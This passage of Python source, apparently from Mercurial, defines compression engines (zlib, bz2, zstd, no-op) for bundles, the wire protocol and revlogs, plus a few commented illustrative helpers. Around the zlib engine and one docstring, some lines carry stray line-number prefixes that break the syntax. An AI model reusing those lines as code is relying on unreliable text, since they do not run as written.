        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

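# A minimal sketch of a conforming engine (hypothetical, for illustration
# only; it is not registered here). A bundle-capable engine needs ``name()``,
# ``bundletype()``, ``compressstream()`` and ``decompressorreader()``; wire
# protocol and revlog support are opt-in via the other methods.
class _identityexampleengine(compressionengine):
    def name(self):
        return 'identity-example'

    def bundletype(self):
        # A None first element keeps the engine out of the user-facing
        # bundle spec namespace.
        return None, '_IDEXAMPLE'

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh
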
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
3429 3441 """
3430 3442 return 'gzip', 'GZ'
3431 3443
3432 3444 def wireprotosupport(self):
3433 3445 return compewireprotosupport('zlib', 20, 20)
3434 3446
3435 3447 def revlogheader(self):
3436 3448 return 'x'
3437 3449
3438 3450 def compressstream(self, it, opts=None):
3439 3451 opts = opts or {}
3440 3452
3441 3453 z = zlib.compressobj(opts.get('level', -1))
3442 3454 for chunk in it:
3443 3455 data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
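
# A hypothetical round-trip sketch for the revlog compressor interface
# (illustrative only; assumes non-empty input, as the interface requires):
# ``compress()`` may return None when compression would not pay off, in
# which case callers store the data uncompressed.
def _examplezlibrevlogroundtrip(data):
    c = compengines['zlib'].revlogcompressor()
    compressed = c.compress(data)
    if compressed is None:
        # Too small or incompressible; a revlog would store ``data`` raw.
        return data
    # zlib output begins with 'x', which doubles as the revlog header
    # declared by revlogheader() above.
    return c.decompress(compressed)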

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled
    # elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
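
# A hypothetical sketch (illustrative only) of how the priorities above
# translate into advertisement order: supportedwireengines() sorts by the
# role's priority, highest first, breaking ties alphabetically, so with
# zstd available a server would list zstd (50) before zlib (20), with
# bzip2 and none (both 0) trailing.
def _exampleserverwireorder():
    engines = compengines.supportedwireengines(SERVERROLE)
    return [e.wireprotosupport().name for e in engines]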

def bundlecompressiontopics():
3735 3747 """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace